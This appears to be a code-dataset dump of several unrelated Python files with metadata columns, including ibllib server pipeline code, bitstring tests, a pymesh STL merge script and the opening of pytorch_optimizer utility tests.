pad, builder = get_unicode_builder(tmpdir)
prog, _ = builder.build(pad.root)
with prog.artifacts[0].open("rb") as f:
assert f.read() == b"<h1>Hello</h1>\n<p>W\xc3\xb6rld</p>\n\n"
def test_unicode_attachment_filename(tmpdir):
pad, builder = get_unicode_builder(tmpdir)
with BufferReporter(builder.env) as reporter:
prog, _ = builder.build(pad.root.attachments.first())
# pylint: disable=no-member
failures = reporter.get_failures()
assert len(failures) == 0
with prog.artifacts[0].open("rb") as f:
assert f.read().rstrip() == b"attachment"
def test_bad_file_ignored(tmpdir):
pad, builder = get_unicode_builder(tmpdir)
record = pad.root.children.first()
with BufferReporter(builder.env) as reporter:
prog, _ = builder.build(record)
# pylint: disable=no-member
failures = reporter.get_failures()
assert len(failures) == 1
exc_info = failures[0]["exc_info"]
assert exc_info[0] is BuildError
assert (
"The URL for this record contains non "
"ASCII characters" in exc_info[1].message
)
|
en
| 0.63398
|
# coding: utf-8 # pylint: disable=no-member # pylint: disable=no-member
| 2.035479
| 2
|
ibllib/pipes/local_server.py
|
hanhou/ibllib
| 0
|
6628062
|
import logging
from datetime import datetime
from pathlib import Path
import pkg_resources
import re
import subprocess
import sys
import traceback
from ibllib.io.extractors.base import get_session_extractor_type, get_pipeline
from ibllib.pipes import ephys_preprocessing, training_preprocessing, tasks
from ibllib.time import date2isostr
import oneibl.registration as registration
from oneibl.one import ONE
_logger = logging.getLogger('ibllib')
def _get_lab(one):
with open(Path.home().joinpath(".globusonline/lta/client-id.txt"), 'r') as fid:
globus_id = fid.read()
lab = one.alyx.rest('labs', 'list', django=f"repositories__globus_endpoint_id,{globus_id}")
if len(lab):
return [la['name'] for la in lab]
def _run_command(cmd):
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
info, error = process.communicate()
if process.returncode != 0:
return None
else:
return info.decode('utf-8').strip()
def _get_volume_usage(vol, label=''):
cmd = f'df {vol}'
res = _run_command(cmd)
# size_list = ['/dev/sdc1', '1921802500', '1427128132', '494657984', '75%', '/datadisk']
size_list = re.split(' +', res.split('\n')[-1])
fac = 1024 ** 2
d = {'total': int(size_list[1]) / fac,
'used': int(size_list[2]) / fac,
'available': int(size_list[3]) / fac,
'volume': size_list[5]}
return {f"{label}_{k}": d[k] for k in d}
def report_health(one):
"""
Get a few indicators and label the json field of the corresponding lab with them
"""
status = {'python_version': sys.version,
'ibllib_version': pkg_resources.get_distribution("ibllib").version,
'phylib_version': pkg_resources.get_distribution("phylib").version,
'local_time': date2isostr(datetime.now())}
status.update(_get_volume_usage('/mnt/s0/Data', 'raid'))
status.update(_get_volume_usage('/', 'system'))
lab_names = _get_lab(one)
for ln in lab_names:
one.alyx.json_field_update(endpoint='labs', uuid=ln, field_name='json', data=status)
def job_creator(root_path, one=None, dry=False, rerun=False, max_md5_size=None):
"""
Server function that will look for creation flags and for each:
1) create the sessions on Alyx
2) register the corresponding raw data files on Alyx
3) create the tasks to be run on Alyx
:param root_path: main path containing sessions or session path
:param one
:param dry
:param rerun
:param max_md5_size
:return:
"""
if not one:
one = ONE()
rc = registration.RegistrationClient(one=one)
flag_files = list(Path(root_path).glob('**/raw_session.flag'))
all_datasets = []
for flag_file in flag_files:
session_path = flag_file.parent
_logger.info(f'creating session for {session_path}')
if dry:
continue
try:
# if the subject doesn't exist in the database, skip
rc.create_session(session_path)
files, dsets = registration.register_session_raw_data(
session_path, one=one, max_md5_size=max_md5_size)
if dsets is not None:
all_datasets.extend(dsets)
pipeline = get_pipeline(session_path)
if pipeline == 'training':
pipe = training_preprocessing.TrainingExtractionPipeline(session_path, one=one)
# only start extracting ephys on a raw_session.flag
elif pipeline == 'ephys' and flag_file.name == 'raw_session.flag':
pipe = ephys_preprocessing.EphysExtractionPipeline(session_path, one=one)
else:
_logger.info(f"Session type {get_session_extractor_type(session_path)}"
f"as no matching pipeline pattern {session_path}")
continue
if rerun:
rerun__status__in = '__all__'
else:
rerun__status__in = ['Waiting']
pipe.create_alyx_tasks(rerun__status__in=rerun__status__in)
flag_file.unlink()
except BaseException:
_logger.error(traceback.format_exc())
_logger.warning(f"Creating session / registering raw datasets {session_path} errored")
continue
return all_datasets
def job_runner(subjects_path, lab=None, dry=False, one=None, count=5):
"""
Function to be used as a process to run the jobs as they are created on the database
THis will query waiting jobs from the specified Lab
:param subjects_path: on servers: /mnt/s0/Data/Subjects. Contains sessions
:param lab: lab name as per Alyx
:param dry:
:param count:
:return:
"""
if one is None:
one = ONE()
if lab is None:
lab = _get_lab(one)
if lab is None:
return # if the lab is none, this will return empty tasks each time
tasks = one.alyx.rest('tasks', 'list', status='Waiting',
django=f'session__lab__name__in,{lab}')
tasks_runner(subjects_path, tasks, one=one, count=count, time_out=3600, dry=dry)
def tasks_runner(subjects_path, tasks_dict, one=None, dry=False, count=5, time_out=None, **kwargs):
"""
Function to run a list of tasks (task dictionary from Alyx query) on a local server
:param subjects_path:
:param tasks_dict:
:param one:
:param dry:
:param count: maximum number of tasks to run
:param time_out: between each task, if time elapsed is greater than time out, returns (seconds)
:param kwargs:
:return: list of dataset dictionaries
"""
if one is None:
one = ONE()
import time
tstart = time.time()
c = 0
last_session = None
all_datasets = []
for tdict in tasks_dict:
# if the count is reached or if the time_out has been elapsed, break the loop and return
if c >= count or (time_out and time.time() - tstart > time_out):
break
# reconstruct the session local path. As many jobs belong to the same session
# cache the result
if last_session != tdict['session']:
ses = one.alyx.rest('sessions', 'list', django=f"pk,{tdict['session']}")[0]
session_path = Path(subjects_path).joinpath(
Path(ses['subject'], ses['start_time'][:10], str(ses['number']).zfill(3)))
last_session = tdict['session']
if dry:
print(session_path, tdict['name'])
else:
task, dsets = tasks.run_alyx_task(tdict=tdict, session_path=session_path,
one=one, **kwargs)
if dsets:
all_datasets.extend(dsets)
c += 1
return all_datasets
|
import logging
from datetime import datetime
from pathlib import Path
import pkg_resources
import re
import subprocess
import sys
import traceback
from ibllib.io.extractors.base import get_session_extractor_type, get_pipeline
from ibllib.pipes import ephys_preprocessing, training_preprocessing, tasks
from ibllib.time import date2isostr
import oneibl.registration as registration
from oneibl.one import ONE
_logger = logging.getLogger('ibllib')
def _get_lab(one):
with open(Path.home().joinpath(".globusonline/lta/client-id.txt"), 'r') as fid:
globus_id = fid.read()
lab = one.alyx.rest('labs', 'list', django=f"repositories__globus_endpoint_id,{globus_id}")
if len(lab):
return [la['name'] for la in lab]
def _run_command(cmd):
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
info, error = process.communicate()
if process.returncode != 0:
return None
else:
return info.decode('utf-8').strip()
def _get_volume_usage(vol, label=''):
cmd = f'df {vol}'
res = _run_command(cmd)
# size_list = ['/dev/sdc1', '1921802500', '1427128132', '494657984', '75%', '/datadisk']
size_list = re.split(' +', res.split('\n')[-1])
fac = 1024 ** 2
d = {'total': int(size_list[1]) / fac,
'used': int(size_list[2]) / fac,
'available': int(size_list[3]) / fac,
'volume': size_list[5]}
return {f"{label}_{k}": d[k] for k in d}
def report_health(one):
"""
Get a few indicators and label the json field of the corresponding lab with them
"""
status = {'python_version': sys.version,
'ibllib_version': pkg_resources.get_distribution("ibllib").version,
'phylib_version': pkg_resources.get_distribution("phylib").version,
'local_time': date2isostr(datetime.now())}
status.update(_get_volume_usage('/mnt/s0/Data', 'raid'))
status.update(_get_volume_usage('/', 'system'))
lab_names = _get_lab(one)
for ln in lab_names:
one.alyx.json_field_update(endpoint='labs', uuid=ln, field_name='json', data=status)
def job_creator(root_path, one=None, dry=False, rerun=False, max_md5_size=None):
"""
Server function that will look for creation flags and for each:
1) create the sessions on Alyx
2) register the corresponding raw data files on Alyx
3) create the tasks to be run on Alyx
:param root_path: main path containing sessions or session path
:param one
:param dry
:param rerun
:param max_md5_size
:return:
"""
if not one:
one = ONE()
rc = registration.RegistrationClient(one=one)
flag_files = list(Path(root_path).glob('**/raw_session.flag'))
all_datasets = []
for flag_file in flag_files:
session_path = flag_file.parent
_logger.info(f'creating session for {session_path}')
if dry:
continue
try:
# if the subject doesn't exist in the database, skip
rc.create_session(session_path)
files, dsets = registration.register_session_raw_data(
session_path, one=one, max_md5_size=max_md5_size)
if dsets is not None:
all_datasets.extend(dsets)
pipeline = get_pipeline(session_path)
if pipeline == 'training':
pipe = training_preprocessing.TrainingExtractionPipeline(session_path, one=one)
# only start extracting ephys on a raw_session.flag
elif pipeline == 'ephys' and flag_file.name == 'raw_session.flag':
pipe = ephys_preprocessing.EphysExtractionPipeline(session_path, one=one)
else:
_logger.info(f"Session type {get_session_extractor_type(session_path)}"
f"as no matching pipeline pattern {session_path}")
continue
if rerun:
rerun__status__in = '__all__'
else:
rerun__status__in = ['Waiting']
pipe.create_alyx_tasks(rerun__status__in=rerun__status__in)
flag_file.unlink()
except BaseException:
_logger.error(traceback.format_exc())
_logger.warning(f"Creating session / registering raw datasets {session_path} errored")
continue
return all_datasets
def job_runner(subjects_path, lab=None, dry=False, one=None, count=5):
"""
Function to be used as a process to run the jobs as they are created on the database
THis will query waiting jobs from the specified Lab
:param subjects_path: on servers: /mnt/s0/Data/Subjects. Contains sessions
:param lab: lab name as per Alyx
:param dry:
:param count:
:return:
"""
if one is None:
one = ONE()
if lab is None:
lab = _get_lab(one)
if lab is None:
return # if the lab is none, this will return empty tasks each time
tasks = one.alyx.rest('tasks', 'list', status='Waiting',
django=f'session__lab__name__in,{lab}')
tasks_runner(subjects_path, tasks, one=one, count=count, time_out=3600, dry=dry)
def tasks_runner(subjects_path, tasks_dict, one=None, dry=False, count=5, time_out=None, **kwargs):
"""
Function to run a list of tasks (task dictionary from Alyx query) on a local server
:param subjects_path:
:param tasks_dict:
:param one:
:param dry:
:param count: maximum number of tasks to run
:param time_out: between each task, if time elapsed is greater than time out, returns (seconds)
:param kwargs:
:return: list of dataset dictionaries
"""
if one is None:
one = ONE()
import time
tstart = time.time()
c = 0
last_session = None
all_datasets = []
for tdict in tasks_dict:
# if the count is reached or if the time_out has been elapsed, break the loop and return
if c >= count or (time_out and time.time() - tstart > time_out):
break
# reconstruct the session local path. As many jobs belong to the same session
# cache the result
if last_session != tdict['session']:
ses = one.alyx.rest('sessions', 'list', django=f"pk,{tdict['session']}")[0]
session_path = Path(subjects_path).joinpath(
Path(ses['subject'], ses['start_time'][:10], str(ses['number']).zfill(3)))
last_session = tdict['session']
if dry:
print(session_path, tdict['name'])
else:
task, dsets = tasks.run_alyx_task(tdict=tdict, session_path=session_path,
one=one, **kwargs)
if dsets:
all_datasets.extend(dsets)
c += 1
return all_datasets
|
en
| 0.781282
|
# size_list = ['/dev/sdc1', '1921802500', '1427128132', '494657984', '75%', '/datadisk'] Get a few indicators and label the json field of the corresponding lab with them Server function that will look for creation flags and for each: 1) create the sessions on Alyx 2) register the corresponding raw data files on Alyx 3) create the tasks to be run on Alyx :param root_path: main path containing sessions or session path :param one :param dry :param rerun :param max_md5_size :return: # if the subject doesn't exist in the database, skip # only start extracting ephys on a raw_session.flag Function to be used as a process to run the jobs as they are created on the database THis will query waiting jobs from the specified Lab :param subjects_path: on servers: /mnt/s0/Data/Subjects. Contains sessions :param lab: lab name as per Alyx :param dry: :param count: :return: # if the lab is none, this will return empty tasks each time Function to run a list of tasks (task dictionary from Alyx query) on a local server :param subjects_path: :param tasks_dict: :param one: :param dry: :param count: maximum number of tasks to run :param time_out: between each task, if time elapsed is greater than time out, returns (seconds) :param kwargs: :return: list of dataset dictionaries # if the count is reached or if the time_out has been elapsed, break the loop and return # reconstruct the session local path. As many jobs belong to the same session # cache the result
| 1.944533
| 2
|
scripts/goodSummaries.py
|
olizhu10/newsroom
| 0
|
6628063
|
<gh_stars>0
import sys
import jsonl
from multiprocessing import Pool
from threading import Lock
from tqdm import tqdm
import nltk
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
import json
def preprocess(sent):
sent = nltk.word_tokenize(sent)
sent = nltk.pos_tag(sent)
return sent
with jsonl.open('../clustering/final_clusters_cleaned0.9_2.jsonl') as f:
clusters = f.read()
with jsonl.open('../dataset_files/train.jsonl.gz', gzip=True) as ds:
articles = ds.read()
def createDictionary():
"""Creates dictionary for entire dataset with article archives as keys and
(summary, text) as values."""
dict = {}
pbar = tqdm(total=len(articles), desc='Generating Dictionary:')
for article in articles:
dict[article['archive']]=(article['summary'],article['text'])
pbar.update(1)
return dict
def namesList(sentence):
nList = []
for word in preprocess(sentence):
if word[1]=="NNP":
nList.append(word[0].lower())
return nList
def fullList(sentence):
nList = []
for word in preprocess(sentence):
nList.append(word[0].lower())
return nList
def nameDifferences(summaryList, articleList):
diffList = []
for word in summaryList:
if not (word in articleList):
return False
return True
def namesListList(list):
nList = []
for sentence in list:
nList.append(namesList(sentence))
return nList
def fullListList(list):
nList = []
for sentence in list:
nList.append(fullList(sentence))
return nList
dict = createDictionary()
def analyzeCluster(x):
smallDict = {}
articleList = []
summaryList = []
for article in clusters[x]:
if(len(preprocess(dict[article][1]))>=50 and len(preprocess(dict[article][0]))>=5):
articleList.append(dict[article][1])
summaryList.append(dict[article][0])
articleList = fullListList(articleList)
summaryList = namesListList(summaryList)
for aIndex, article in enumerate(articleList, start = 0):
summaries = []
for sIndex, summary in enumerate(summaryList, start = 0):
if(nameDifferences(summary, article) or aIndex == sIndex):
summaries.append(clusters[x][sIndex])
if len(summaries)>=4:
smallDict[clusters[x][aIndex]] = summaries
return smallDict
def main():
articleDict = {}
pbar = tqdm(total=len(clusters), desc='Going through Clusters:')
qbar = tqdm(total=70000, desc='Good articles found with >=4 summaries:')
with Pool(processes=15) as pool:
for smallDict in pool.imap_unordered(analyzeCluster, range(len(clusters))):
for key in smallDict:
articleDict[key] = smallDict[key]
qbar.update(1)
pbar.update(1)
with open('../clustering/articleSummaryPairsMinLength.json', 'w+') as file:
json.dump(articleDict, file)
if __name__ == '__main__':
main()
|
import sys
import jsonl
from multiprocessing import Pool
from threading import Lock
from tqdm import tqdm
import nltk
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
import json
def preprocess(sent):
sent = nltk.word_tokenize(sent)
sent = nltk.pos_tag(sent)
return sent
with jsonl.open('../clustering/final_clusters_cleaned0.9_2.jsonl') as f:
clusters = f.read()
with jsonl.open('../dataset_files/train.jsonl.gz', gzip=True) as ds:
articles = ds.read()
def createDictionary():
"""Creates dictionary for entire dataset with article archives as keys and
(summary, text) as values."""
dict = {}
pbar = tqdm(total=len(articles), desc='Generating Dictionary:')
for article in articles:
dict[article['archive']]=(article['summary'],article['text'])
pbar.update(1)
return dict
def namesList(sentence):
nList = []
for word in preprocess(sentence):
if word[1]=="NNP":
nList.append(word[0].lower())
return nList
def fullList(sentence):
nList = []
for word in preprocess(sentence):
nList.append(word[0].lower())
return nList
def nameDifferences(summaryList, articleList):
diffList = []
for word in summaryList:
if not (word in articleList):
return False
return True
def namesListList(list):
nList = []
for sentence in list:
nList.append(namesList(sentence))
return nList
def fullListList(list):
nList = []
for sentence in list:
nList.append(fullList(sentence))
return nList
dict = createDictionary()
def analyzeCluster(x):
smallDict = {}
articleList = []
summaryList = []
for article in clusters[x]:
if(len(preprocess(dict[article][1]))>=50 and len(preprocess(dict[article][0]))>=5):
articleList.append(dict[article][1])
summaryList.append(dict[article][0])
articleList = fullListList(articleList)
summaryList = namesListList(summaryList)
for aIndex, article in enumerate(articleList, start = 0):
summaries = []
for sIndex, summary in enumerate(summaryList, start = 0):
if(nameDifferences(summary, article) or aIndex == sIndex):
summaries.append(clusters[x][sIndex])
if len(summaries)>=4:
smallDict[clusters[x][aIndex]] = summaries
return smallDict
def main():
articleDict = {}
pbar = tqdm(total=len(clusters), desc='Going through Clusters:')
qbar = tqdm(total=70000, desc='Good articles found with >=4 summaries:')
with Pool(processes=15) as pool:
for smallDict in pool.imap_unordered(analyzeCluster, range(len(clusters))):
for key in smallDict:
articleDict[key] = smallDict[key]
qbar.update(1)
pbar.update(1)
with open('../clustering/articleSummaryPairsMinLength.json', 'w+') as file:
json.dump(articleDict, file)
if __name__ == '__main__':
main()
|
en
| 0.933228
|
Creates dictionary for entire dataset with article archives as keys and
(summary, text) as values.
| 2.535152
| 3
|
scripts/rig/show_dataset_image.py
|
Asap7772/railrl_evalsawyer
| 1
|
6628064
|
<gh_stars>1-10
import argparse
import uuid
import cv2
import numpy as np
filename = str(uuid.uuid4())
def vis(args):
imgs = np.load(args.file)
for image_obs in imgs:
if image_obs.size == 6912:
im = image_obs.reshape(3, 48, 48).transpose()
else:
im = image_obs.reshape(3, 84, 84).transpose()
cv2.imshow('img', im)
cv2.waitKey(10)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file', type=str,
help='path to the snapshot file')
args = parser.parse_args()
vis(args)
|
import argparse
import uuid
import cv2
import numpy as np
filename = str(uuid.uuid4())
def vis(args):
imgs = np.load(args.file)
for image_obs in imgs:
if image_obs.size == 6912:
im = image_obs.reshape(3, 48, 48).transpose()
else:
im = image_obs.reshape(3, 84, 84).transpose()
cv2.imshow('img', im)
cv2.waitKey(10)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file', type=str,
help='path to the snapshot file')
args = parser.parse_args()
vis(args)
|
none
| 1
| 2.79777
| 3
|
|
test/test_bitstring.py
|
oittaa/bitstring
| 0
|
6628065
|
<filename>test/test_bitstring.py
#!/usr/bin/env python
"""
Module-level unit tests.
"""
import copy
import unittest
import bitstring
class ModuleData(unittest.TestCase):
def testVersion(self):
self.assertEqual(bitstring.__version__, "3.1.9")
def testAll(self):
exported = [
"ConstBitArray",
"ConstBitStream",
"BitStream",
"BitArray",
"Bits",
"BitString",
"pack",
"Error",
"ReadError",
"InterpretError",
"ByteAlignError",
"CreationError",
"bytealigned",
"set_lsb0",
"set_msb0",
]
self.assertEqual(set(bitstring.__all__), set(exported))
def testReverseDict(self):
d = bitstring.BYTE_REVERSAL_DICT
for i in range(256):
a = bitstring.Bits(uint=i, length=8)
b = d[i]
self.assertEqual(a.bin[::-1], bitstring.Bits(bytes=b).bin)
def testAliases(self):
self.assertTrue(bitstring.Bits is bitstring.ConstBitArray)
self.assertTrue(bitstring.BitStream is bitstring.BitString)
class MemoryUsage(unittest.TestCase):
def testBaselineMemory(self):
try:
import pympler.asizeof.asizeof as size
except ImportError:
return
# These values might be platform dependent, so don't fret too much.
self.assertEqual(size(bitstring.ConstBitStream([0])), 64)
self.assertEqual(size(bitstring.Bits([0])), 64)
self.assertEqual(size(bitstring.BitStream([0])), 64)
self.assertEqual(size(bitstring.BitArray([0])), 64)
from bitstring.bitstore import ByteStore
self.assertEqual(size(ByteStore(bytearray())), 100)
class Copy(unittest.TestCase):
def testConstBitArrayCopy(self):
import copy
cba = bitstring.Bits(100)
cba_copy = copy.copy(cba)
self.assertTrue(cba is cba_copy)
def testBitArrayCopy(self):
ba = bitstring.BitArray(100)
ba_copy = copy.copy(ba)
self.assertFalse(ba is ba_copy)
self.assertFalse(ba._datastore is ba_copy._datastore)
self.assertTrue(ba == ba_copy)
def testConstBitStreamCopy(self):
cbs = bitstring.ConstBitStream(100)
cbs.pos = 50
cbs_copy = copy.copy(cbs)
self.assertEqual(cbs_copy.pos, 0)
self.assertTrue(cbs._datastore is cbs_copy._datastore)
self.assertTrue(cbs == cbs_copy)
def testBitStreamCopy(self):
bs = bitstring.BitStream(100)
bs.pos = 50
bs_copy = copy.copy(bs)
self.assertEqual(bs_copy.pos, 0)
self.assertFalse(bs._datastore is bs_copy._datastore)
self.assertTrue(bs == bs_copy)
class Interning(unittest.TestCase):
def testBits(self):
a = bitstring.Bits("0xf")
b = bitstring.Bits("0xf")
self.assertTrue(a is b)
c = bitstring.Bits("0b1111")
self.assertFalse(a is c)
def testCBS(self):
a = bitstring.ConstBitStream("0b11000")
b = bitstring.ConstBitStream("0b11000")
self.assertFalse(a is b)
class LSB0(unittest.TestCase):
def testGettingAndSetting(self):
self.assertEqual(bitstring._lsb0, False)
bitstring.set_lsb0()
self.assertEqual(bitstring._lsb0, True)
bitstring.set_lsb0(False)
self.assertEqual(bitstring._lsb0, False)
bitstring.set_msb0(False)
self.assertEqual(bitstring._lsb0, True)
bitstring.set_msb0()
self.assertEqual(bitstring._lsb0, False)
|
<filename>test/test_bitstring.py
#!/usr/bin/env python
"""
Module-level unit tests.
"""
import copy
import unittest
import bitstring
class ModuleData(unittest.TestCase):
def testVersion(self):
self.assertEqual(bitstring.__version__, "3.1.9")
def testAll(self):
exported = [
"ConstBitArray",
"ConstBitStream",
"BitStream",
"BitArray",
"Bits",
"BitString",
"pack",
"Error",
"ReadError",
"InterpretError",
"ByteAlignError",
"CreationError",
"bytealigned",
"set_lsb0",
"set_msb0",
]
self.assertEqual(set(bitstring.__all__), set(exported))
def testReverseDict(self):
d = bitstring.BYTE_REVERSAL_DICT
for i in range(256):
a = bitstring.Bits(uint=i, length=8)
b = d[i]
self.assertEqual(a.bin[::-1], bitstring.Bits(bytes=b).bin)
def testAliases(self):
self.assertTrue(bitstring.Bits is bitstring.ConstBitArray)
self.assertTrue(bitstring.BitStream is bitstring.BitString)
class MemoryUsage(unittest.TestCase):
def testBaselineMemory(self):
try:
import pympler.asizeof.asizeof as size
except ImportError:
return
# These values might be platform dependent, so don't fret too much.
self.assertEqual(size(bitstring.ConstBitStream([0])), 64)
self.assertEqual(size(bitstring.Bits([0])), 64)
self.assertEqual(size(bitstring.BitStream([0])), 64)
self.assertEqual(size(bitstring.BitArray([0])), 64)
from bitstring.bitstore import ByteStore
self.assertEqual(size(ByteStore(bytearray())), 100)
class Copy(unittest.TestCase):
def testConstBitArrayCopy(self):
import copy
cba = bitstring.Bits(100)
cba_copy = copy.copy(cba)
self.assertTrue(cba is cba_copy)
def testBitArrayCopy(self):
ba = bitstring.BitArray(100)
ba_copy = copy.copy(ba)
self.assertFalse(ba is ba_copy)
self.assertFalse(ba._datastore is ba_copy._datastore)
self.assertTrue(ba == ba_copy)
def testConstBitStreamCopy(self):
cbs = bitstring.ConstBitStream(100)
cbs.pos = 50
cbs_copy = copy.copy(cbs)
self.assertEqual(cbs_copy.pos, 0)
self.assertTrue(cbs._datastore is cbs_copy._datastore)
self.assertTrue(cbs == cbs_copy)
def testBitStreamCopy(self):
bs = bitstring.BitStream(100)
bs.pos = 50
bs_copy = copy.copy(bs)
self.assertEqual(bs_copy.pos, 0)
self.assertFalse(bs._datastore is bs_copy._datastore)
self.assertTrue(bs == bs_copy)
class Interning(unittest.TestCase):
def testBits(self):
a = bitstring.Bits("0xf")
b = bitstring.Bits("0xf")
self.assertTrue(a is b)
c = bitstring.Bits("0b1111")
self.assertFalse(a is c)
def testCBS(self):
a = bitstring.ConstBitStream("0b11000")
b = bitstring.ConstBitStream("0b11000")
self.assertFalse(a is b)
class LSB0(unittest.TestCase):
def testGettingAndSetting(self):
self.assertEqual(bitstring._lsb0, False)
bitstring.set_lsb0()
self.assertEqual(bitstring._lsb0, True)
bitstring.set_lsb0(False)
self.assertEqual(bitstring._lsb0, False)
bitstring.set_msb0(False)
self.assertEqual(bitstring._lsb0, True)
bitstring.set_msb0()
self.assertEqual(bitstring._lsb0, False)
|
en
| 0.69183
|
#!/usr/bin/env python Module-level unit tests. # These values might be platform dependent, so don't fret too much.
| 2.734505
| 3
|
extra/mesh_repair/repair_mesh.py
|
digisomni/character-creator-1
| 17
|
6628066
|
#!/usr/bin/env python
"""STL union script using pymesh"""
__author__ = "<NAME>, <EMAIL>"
__license__ = "MIT"
__date__ = "05/09/2018"
# Usage:
# docker run -it --rm -v `pwd`:/root `meshes`:/meshes qnzhou/pymesh python repair_mesh.py -v
## Libraries -------------------
import time
import pymesh
import numpy as np
from numpy.linalg import norm
## Functions -------------------
def load_mesh(fileName):
'''loading mesh using pymesh'''
return pymesh.load_mesh("/meshes/"+fileName+".stl");
def mesh_union(meshA, meshB):
'''Mesh union between meshA and meshB, needs to be intersecting faces'''
return pymesh.boolean(meshA, meshB, operation="union", engine="igl")
start_time = time.time()
## Opening up the files -------------------
ArmR = load_mesh("mesh-arm-r")
HandR = load_mesh("mesh-hand-r")
ArmL = load_mesh("mesh-arm-l")
HandL = load_mesh("mesh-hand-l")
Head = load_mesh("mesh-head")
LegL = load_mesh("mesh-leg-l")
FootL = load_mesh("mesh-foot-l")
LegR = load_mesh("mesh-leg-r")
FootR = load_mesh("mesh-foot-r")
Torso = load_mesh("mesh-torso")
Stand = load_mesh("stand")
## Unions -------------------
A = pymesh.merge_meshes([HandR, HandL, FootR, FootL, Torso])
B = pymesh.merge_meshes([ArmR, ArmL, Head, LegL, LegR, Stand])
Output = mesh_union(A, B)
pymesh.save_mesh("/meshes/myCharacter.stl", Output)
print("Mesh merged successfully!")
print("--- %s seconds ---" % (time.time() - start_time))
|
#!/usr/bin/env python
"""STL union script using pymesh"""
__author__ = "<NAME>, <EMAIL>"
__license__ = "MIT"
__date__ = "05/09/2018"
# Usage:
# docker run -it --rm -v `pwd`:/root `meshes`:/meshes qnzhou/pymesh python repair_mesh.py -v
## Libraries -------------------
import time
import pymesh
import numpy as np
from numpy.linalg import norm
## Functions -------------------
def load_mesh(fileName):
'''loading mesh using pymesh'''
return pymesh.load_mesh("/meshes/"+fileName+".stl");
def mesh_union(meshA, meshB):
'''Mesh union between meshA and meshB, needs to be intersecting faces'''
return pymesh.boolean(meshA, meshB, operation="union", engine="igl")
start_time = time.time()
## Opening up the files -------------------
ArmR = load_mesh("mesh-arm-r")
HandR = load_mesh("mesh-hand-r")
ArmL = load_mesh("mesh-arm-l")
HandL = load_mesh("mesh-hand-l")
Head = load_mesh("mesh-head")
LegL = load_mesh("mesh-leg-l")
FootL = load_mesh("mesh-foot-l")
LegR = load_mesh("mesh-leg-r")
FootR = load_mesh("mesh-foot-r")
Torso = load_mesh("mesh-torso")
Stand = load_mesh("stand")
## Unions -------------------
A = pymesh.merge_meshes([HandR, HandL, FootR, FootL, Torso])
B = pymesh.merge_meshes([ArmR, ArmL, Head, LegL, LegR, Stand])
Output = mesh_union(A, B)
pymesh.save_mesh("/meshes/myCharacter.stl", Output)
print("Mesh merged successfully!")
print("--- %s seconds ---" % (time.time() - start_time))
|
en
| 0.367603
|
#!/usr/bin/env python STL union script using pymesh # Usage: # docker run -it --rm -v `pwd`:/root `meshes`:/meshes qnzhou/pymesh python repair_mesh.py -v ## Libraries ------------------- ## Functions ------------------- loading mesh using pymesh Mesh union between meshA and meshB, needs to be intersecting faces ## Opening up the files ------------------- ## Unions -------------------
| 2.475365
| 2
|
tests/test_utils.py
|
kozistr/pytorch_optimizer
| 20
|
6628067
|
from typing import List
import numpy as np
import pytest
import torch
from torch import nn
from pytorch_optimizer.utils import (
clip_grad_norm,
get_optimizer_parameters,
has_overflow,
is_valid_parameters,
neuron_mean,
neuron_norm,
normalize_gradient,
unit_norm,
)
from tests.utils import Example
def test_has_overflow():
assert has_overflow(np.inf)
assert has_overflow(np.nan)
assert not has_overflow(torch.Tensor([1]))
def test_normalized_gradient():
x = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_allclose(
normalize_gradient(x).numpy(),
np.asarray([0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]),
rtol=1e-4,
atol=1e-4,
)
np.testing.assert_allclose(
normalize_gradient(x.view(1, 10), use_channels=True).numpy(),
np.asarray([[0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]]),
rtol=1e-4,
atol=1e-4,
)
def test_clip_grad_norm():
x = torch.arange(0, 10, dtype=torch.float32, requires_grad=True)
x.grad = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_approx_equal(clip_grad_norm(x), 16.881943016134134, significant=4)
np.testing.assert_approx_equal(clip_grad_norm(x, max_norm=2), 16.881943016134134, significant=4)
def test_unit_norm():
x = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_approx_equal(unit_norm(x).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10)).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1)).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1, 1, 1)).numpy(), 16.8819, significant=4)
def test_neuron_mean_norm():
x = torch.arange(-5, 5, dtype=torch.float32)
with pytest.raises(ValueError):
neuron_mean(x)
np.testing.assert_array_equal(
neuron_mean(x.view(-1, 1)).numpy(),
np.asarray([[-5.0], [-4.0], [-3.0], [-2.0], [-1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
)
np.testing.assert_array_equal(
neuron_norm(x).numpy(), np.asarray([5.0, 4.0, 3.0, 2.0, 1.0, 0.0, 1.0, 2.0, 3.0, 4.0])
)
np.testing.assert_array_equal(
neuron_norm(x.view(-1, 1)).numpy(),
np.asarray([[5.0], [4.0], [3.0], [2.0], [1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
)
def test_get_optimizer_parameters():
model: nn.Module = Example()
wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
before_parameters = list(model.named_parameters())
after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
for before, after in zip(before_parameters, after_parameters):
layer_name: str = before[0]
if layer_name.find('bias') != -1 or layer_name in wd_ban_list:
assert after['weight_decay'] == 0.0
def test_is_valid_parameters():
model: nn.Module = Example()
wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
assert is_valid_parameters(after_parameters)
|
from typing import List
import numpy as np
import pytest
import torch
from torch import nn
from pytorch_optimizer.utils import (
